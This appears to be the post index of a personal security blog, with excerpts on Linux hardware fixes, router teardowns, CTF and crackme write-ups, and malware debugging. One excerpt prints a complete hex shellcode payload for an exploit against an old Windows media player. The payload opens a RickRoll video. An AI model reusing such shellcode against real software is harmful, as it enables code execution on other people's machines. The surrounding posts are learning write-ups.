Infosec scribbles

How I Picked and Set Up a SmartCard

Sun, 19 Jul 2020 19:00:00 +0100

Since I had to migrate my work machine to Windows, it became impossible to use the TPM of my Precision 5520 as a secure key store. The open source tpm2-software stack does not work on Windows, and there is no alternative software stack provided by Microsoft. So I figured, might as well switch to a crypto stick. This post contains my notes from that process.

Making a wish: Ubuntu 20.04 LTS

Sat, 09 Nov 2019 16:02:03 +0000

Ubuntu 20.04 LTS is on the horizon and while we’re all hyped about the new set of wallpapers, here is my small wish list of technical improvements to have out of the box in the next LTS:

eGPU Adventures on Linux

Sat, 09 Nov 2019 13:31:41 +0000

I was pretty impressed with two new pieces of technology recently:

Being able to run Quake Champions on Linux using Proton
External GPUs seeing just a 20% performance hit on external displays and being compatible with Linux

Below are results of my experiments.

HackerOne CTF at 44CON: Binary 500

Sat, 21 Sep 2019 15:00:00 +0100

There has been somewhat of a hiatus to my ARM crackme series. There are two reasons for this: r2con 2019 and 44CON 2019. Both had CTF challenges and that’s what I’ve been busy with.

First item on the list is the 500 points binary challenge from 44CON:

┌─────┐                 ┌─────┐
│ BIN │                 │ WEB │
│     ├─┐             ┌>│     ├┐
│ ¥10 │ │             │ │ ¥30 ││
└─────┘ │             │ └─────┘│
┌─────┐ │    ┌──────┐ │        │  ┌──────┐  ┌──────┐  ┌──────┐
│ WEB │ │    │  WEB │ │        │  │  TRI │  │  WEB │  │  BIN │
│     ├─┼─┬─>│      ├─┤        ├─>│      ├─>│      ├─>│      │
│ ¥ 5 │ │ │  │  ¥10 │ │        │  │ ¥100 │  │ ¥120 │  │ ¥250 │
└─────┘ │ │  └──────┘ │        │  └──────┘  └──────┘  └──────┘
┌─────┐ │ │  ╔══════╗ │ ┌─────┐│
│ TRI │ │ │  ║  BIN ║ │ │ BIN ││
│     ├─┘ └─>║      ║ └>│     ├┘
│ ¥ 3 │      ║ ¥500 ║   │ ¥50 │
└─────┘      ╚══════╝   └─────┘

Crackmes Series: ARM, part 2

Sun, 04 Aug 2019 19:31:00 +0100

Recently, I decided to put my reversing skills to a test by solving some of the public crackmes and writing down my solutions. This is the second post of the series.

For work, I do some very basic Android, TEE, RASP and IoT reversing, but most of those tasks are too shallow and repetitive. You can’t get much depth when reversing is an “if there’s time to waste” part of an engagement with overall length of a week and bottomless scope, so this series is about a monkey learning to dive deeper.

I decided to source my first batch of challenges from Crackmes.One. Second challenge is of difficulty level 2 and is targeting ARM/Linux.

Crackmes Series: ARM, part 1

Sat, 03 Aug 2019 13:11:00 +0100

Recently, I decided to put my reversing skills to a test by solving some of the public crackmes and writing down my solutions. This is the first of many to come.

I decided to source my first batch of challenges from Crackmes.One. First challenge is of difficulty level 1 and is targeting ARM/Linux.

The sad state of font rendering on Linux

Fri, 21 Dec 2018 15:38:26 +0100

Preamble

As it turns out, font rendering is a highly controversial topic. If you don’t see anything wrong with Linux font rendering, please disregard this as a shitpost. Thanks.

I spent the first 25 years of my life on Windows and therefore I am biased towards Windows font rendering with ClearType. I also agree with research which suggests that this rendering approach makes reading easier on the eyes. There are also some facts you can’t argue with, such as non-linear rendering without anti-aliasing looking awful.

With that out of the way, let’s proceed.

How to (offline) update standalone ESXi in your homelab

Thu, 20 Dec 2018 21:38:26 +0100

Say you have a homelab and, like me, you don’t have the space for a 42U rack and an enterprise vSphere license. Your options are Hyper-V, Xen, Proxmox or… a standalone ESXi machine on a free license.

Every now and then VMware releases updates for it, but there is no way to get them automatically on a standalone ESXi host. Thankfully, it’s not too hard to do by hand and here is a step-by-step that I wrote down for my own purposes.

Outdated ESXi hosts also may or may not be one of the most common findings in network security tests.

Getting Intel GuC to work on Ubuntu

Fri, 20 Jul 2018 19:00:00 +0100

It turns out Intel GuC and HuC bits of the i915 driver don’t get loaded by default on Linux. Ubuntu kernel changes make it extra difficult to get them to load manually, so I wrote it down. This is how you get it to work.

Ubuntu Update Notifications via SMTP Relay

Sun, 25 Mar 2018 14:00:00 +0000

One thing I really wanted to have on my server was the ability for system packages to send mail externally. This is useful for upgrade notifications or any kind of monitoring alerts that systems may emit. One the other hand, I have better things to do than worry about a private mail server. The solution I came up with is setting up postfix to act as an SMTP-relay, using an SMTP account at a third-party mail server for outgoing mail.

Bluetooth on Linux: Getting QC35 to work

Sun, 25 Mar 2018 13:00:00 +0100

This is a continuation to my series of migrating to Linux posts.

If you try to pair Bose QC35 with an Ubuntu 16.04 LTS box, you will notice that it always pairs in headset mode, acts as if a call has just started and then disconnects. If you try to manually select A2DP Sink in sound settings, it will fail without any warning message displayed. Next time you open sound settings you will find that i has reset itself to HSP/HFP. Time to check journalctl output and find out that something isn’t right.

Below are the steps I managed to compile based on numerous other blog posts and AskUbuntu questions that didn’t work on their own, but worked in this combination.

Solving Ubuntu issues on a Dell XPS 15 9560

Thu, 01 Mar 2018 22:00:00 +0100

Being more happy than not with the experience I had at work with a Dell Precision 5520 running Ubuntu, I looked closer at Project Sputnik when time came to replace my beaten up Inspiron 17R. I decided to get myself an XPS 15 based on Intel’s 7th gen platform. Of course, given the opportunity to pick, I decided against a 4K UHD screen, against a touchscreen and picked a matte cover too instead of a glossy one. That solved my biggest woes right away.

In short, I’ve never had such a good experience with a power user laptop and the Project Sputnik team deserves all the fame, praises and customer money that they are getting. To all those engineers and hackers unhappy with Windows 10 and looking into Apple or Linux-based alternatives, I suggest that you look into Dell’s offering.

Below you will find workarounds for a few software issues that I had to resolve with it to get my perfect machine. As of March 2018, this applies to Ubuntu 16.04 LTS.

Linux Woes and 4K Hell

Sat, 14 Oct 2017 15:00:00 +0100

Note: this post has now been updated for 18.04 LTS.

Recently I got a new Dell Precision 5520 and a TB16 dock. It came with Windows 10, and as I was quick to learn, “10” is the number of minutes it took me to decide that I would rather use anything else. This is coming from someone who has been using Windows on all non-server machines since age 7. Given the available options, I went for Ubuntu Linux.

As it turned out, Linux came with its own set of problems, and 4K or HiDPI has below usable support no matter which OS you choose.

I will maintain this post with status updates on the issues listed so that others can reuse my solutions. Another reason is that a bunch of my coworkers have decided to follow suit upon seeing Windows 10 and this is the most efficient way of helping them with the issues they are about to face.

Current setup: Ubuntu GNOME 18.04 LTS, 5.0 mainline kernel.

Logitech Z506 10-pin connector pinout

Sat, 24 May 2014 12:59:00 +0100

Had to pop open my Logitech Z506 speaker the other day because reasons. Thought that this may come in handy to someone looking for which wire goes to which pin on the 10-pin connector aka connector pinout. On the picture below I marked every pin with the color of the corresponding wire. It may be hard to see on the preview but the black one is ground. Happy tinkering!

Writing a RickRoll shellcode

Thu, 13 Feb 2014 22:56:26 +0100

I was sitting in the lab the other day ~socializing~ with other students and we all agreed it was sad that there was no shellcode out there that would open a RickRoll. Making one seemed like a good way to procrastinate from preparing a talk on privacy while learning how to write shellcodes and the challenge was accepted. The application to have fun with was Chasys Media Player 1.1 on Windows XP SP3, no DEP or ASLR.

TL;DR:

\x89\xE5\x83\xEC\x7F\x83\xEC\x7F\x83\xEC\x06\x31\xC0\x88\x45\x84\x88\x45\x91\x88\x45\xB1\x88\x45\xBD\x88\x45\xCB\x88\x45\xD0\x88\x45\xFB\x89\xEB\x83\xEB\x4E\x53\xFF\x15\x7C\x90\x41\xFF\x89\xEB\x83\xEB\x42\x53\x50\xFF\x15\x24\x91\x41\xFF\x6A\x01\x31\xC9\x51\x51\x89\xEB\x83\xEB\x2F\x53\x89\xEB\x83\xEB\x34\x53\x31\xC9\x51\xFF\xD0\x31\xC9\x51\xFF\x15\xE4\x90\x41\xFF\x53\x68\x65\x6C\x6C\x33\x32\x2E\x64\x6C\x6C\x21\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x41\x21\x6F\x70\x65\x6E\x21\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x79\x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x76\x3D\x6F\x48\x67\x35\x53\x4A\x59\x52\x48\x41\x30\x21

Debugging MBRLockers on Windows

Sun, 09 Feb 2014 02:19:29 +0100

Ever met MBRLockers? Yes, those nasty pieces of malware which replace your Master Boot Record with malicious code and ransom you. Good news here, most of them just backup your original MBR somewhere and put one asking for ransom in its place. Today I’m going to tell you how to debug these things easily for ehmm, scientific purposes.

How to take apart ST780WL and extract the parts from it

Thu, 06 Jun 2013 08:57:14 +0100

Here comes a little addition to the TG789vn article: this time we will see how to open ST780WL. This is required if you want to JTAG your router or replace the antenna with something more powerful.

How to take apart TG789vn and extract the parts from it

Wed, 05 Jun 2013 20:26:09 +0100

So I recently got a box full of Thomson TG789vn routers with half of them not working properly. Say “Hello” to lightnings hitting the power lines in Estonia. With nothing to lose it was decided to pop one open to see if there is any obvious damage that can be repaired. Surprisingly, there were no guides on the internet on how to open TG789vn without breaking anything, so here is one.

Stuff You Will Need

Thomson TG789vn router
Phillips screwdriver
Flat-blade screwdriver
Two hands and a little bit of common sense

Needless to say, before doing any of this you need to turn off your router and unplug everything from it. This will also void your warranty and I will not be held responsible for any damage you may or may not inflict upon your router.

B-Sides London 2013

Fri, 26 Apr 2013 00:39:50 +0100

This was my second time at B-Sides London and 3rd time at a huge hacking conference. But considering countless tech meetups, Abertay Ethical Hacking Society meetings and stuff like that one could say I am a frequent goer to such events.

Anyway,

Fixing broken Sublime Text hot keys

Thu, 11 Apr 2013 14:22:35 +0100

Once you start using Sublime Text, you will begin putting together a collection of plugins to simplify your life. The amount of keys on your keyboard is rather limited and Sublime is a key mapping heavy editor. Lots of comfy hot keys are used even by default. Every once in a while you will get a plugin that wants to use one of the keys that is already in use. At this point you will end up wondering why some of the default key mappings are broken and this article will hopefully help you to fix conflicting hot keys.

How to disable Metro UI in Skype

Tue, 09 Apr 2013 15:33:06 +0100

Since I had automatic updates in Skype enabled, yesterday it updated to version 6.3. As it is very common these days, the interface was “improved” to match other Microsoft’s products in their UI style, Metro UI of Windows 8. I personally can’t stand it, but in previous versions there was a switch in options to use system theme. I decided it was time to downgrade. If you are looking for how to get rid of Metro UI in Skype and disable annoying update pop-ups, keep reading.

Please keep scrolling if you enjoy Metro UI.

Downloads window and other tweaks in Firefox 20

Sun, 07 Apr 2013 11:43:16 +0100

UPDATE: This feature has been completely removed from Firefox with release of version 26. If you would like to use a functional downloads manager, you can try DownThemAll!.

Today was the day when I finally decided to upgrade to the latest versions of everything. Which of course included Firefox. What I instantly noticed after starting up a new version was this tiny new button for opening the downloads window:

Oh, that’s a good idea. Now I don’t have to look for my downloads in the menu.

The excitement vanished instantly when I saw the monstrosity they have turned the downloads window into.

Not so well-known Skype features

Mon, 30 Jul 2012 21:01:11 +0100

Me and my friends really enjoy Skype conferences. And even though it belongs to the corporation of evil these days, there does not seem to be a good alternative.

So lets try our best and make our Skype more comfy.

About Georgi Boiko

Mon, 01 Jan 0001 00:00:00 +0000

For the better part of the last decade I have been involved in software security. I graduated from Abertay University with a BSc (Hons) in Ethical Hacking and Countermeasures. In parallel with my studies, I started out my professional career as a web developer with some joint security responsibilities at an amazing Scottish web design studio, MTC Media. Upon my graduation, I moved to London to become a full time security consultant at Cigital, later acquired by Synopsys Software Integrity Group.

All posts

Mon, 01 Jan 0001 00:00:00 +0000

You can find links to all my past posts here.

Fixing the Linux font rendering stack checklist

Mon, 01 Jan 0001 00:00:00 +0000

This is a “note to self” type of page. It spawned from my research on Linux font rendering after realizing how unfortunate the situation was. Desktop Linux in general cannot boast great software craftsmanship and is a bit of a cesspit, but font rendering in particular is easy enough to fix. Get subpixel positioning enabled in Chrome. Chromium team is not interested in fixing it, but you can use the bug feature in comment 39 here Currently there is a nasty bug in Chromium that will break kerning when combining this with the v40 TrueType hinting engine of FreeType.

My Public Projects

Mon, 01 Jan 0001 00:00:00 +0000

Due to corporate IP clauses in employment contracts most of the code I write never ends up being publicly available. These are the things that were either started prior to those clauses affecting me or that got cleared for publishing by my employer: (2020) Android Biometric Crypto Testbench, an app that lets you play with parameters of BiometricPrompt on Android and queries some under the hood stuff that is otherwise not exposed to GUIs (2020) CVE-2020-7958 writeup about how I was able to pull raw fingerprint images from the TEE on Android (2020) QSEE Trustlet Tool, a somewhat more complete version of Gal Beniamini’s unify_trustlet that can handle 64-bit TAs for QSEE and quirks of their stripping tool that break disassemblers (2020) A couple of lines of C for printing out signatures in NVidia Tegra firmware blobs (2016) Flower monitoring system based on ESP8266 (2016) SafetyNet playground Android app and backend (2011-2016) EVE Anon, an Russian EVE Online community I used to run as a student (2013-2014) Kotkas, a bunch of bird watching cameras from various sources aggregated into a single page with a WebSockets-based chat that was active in 2013-2014